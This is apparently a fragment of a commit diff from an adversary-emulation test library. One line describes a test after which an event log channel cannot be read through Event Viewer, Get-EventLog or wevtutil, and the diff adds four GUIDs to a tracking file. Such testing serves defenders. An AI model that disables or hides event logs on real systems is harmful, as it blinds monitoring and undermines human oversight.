     Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".

atomics/used_guids.txt

@@ -1701,3 +1701,7 @@ de323a93-2f18-4bd5-ba60-d6fca6aeff76
 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4
 a27916da-05f2-4316-a3ee-feec67a437be
 22c779cd-9445-4d3e-a136-f75adbf0315f
+a8568b10-9ab9-4140-a523-1c72e0176924
+8e81d090-0cd6-4d46-863c-eec11311298f
+85e6eff8-3ed4-4e03-ae50-aa6a404898a5
+a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1